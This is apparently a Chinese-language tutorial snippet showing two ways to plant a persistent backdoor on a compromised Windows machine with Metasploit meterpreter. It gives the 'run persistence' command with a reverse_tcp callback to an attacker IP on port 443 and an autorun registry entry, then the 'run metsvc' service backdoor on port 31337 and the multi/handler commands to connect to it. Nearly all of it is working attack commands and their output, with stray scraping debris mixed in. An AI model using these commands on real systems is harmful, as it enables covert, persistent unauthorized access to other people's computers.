安装后门方法一:
meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108
Persistent agent script is 609628 bytes long
RunningPersistance Script
Resource filefor cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
CreatingPayload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[+] PersistentScript written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs Starting the service...
Executingscript C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agentexecuted with PID 1888
Installing intoautorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installedinto autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
^9 b5 q" j
然后它就在目标机的C:/windows/Temp/下建立一个vbs文件,开机会启动这个文件上面的vbs的确存在
注释,反弹时间间隔是5s 端口是443 Metasploit服务器Ip是192.168.0.108,缺点是容易被杀毒软件查杀|9 y$ t
3 X' c d)W l$ s
安装后门方法二:
meterpreter >run metsvc
Creating ameterpreter service on port 31337
Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...
>>Uploading metsrv.dll...
>>Uploading metsvc-server.exe...
>>Uploading metsvc.exe...
* Installingservice metsvc
* Startingservice
Service metsvcsuccessfully installed.
meterpreter>
后门如何利用啊?
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
msf exploit(handler) > set RHOST 192.168.200.140
msf exploit(handler)> exploit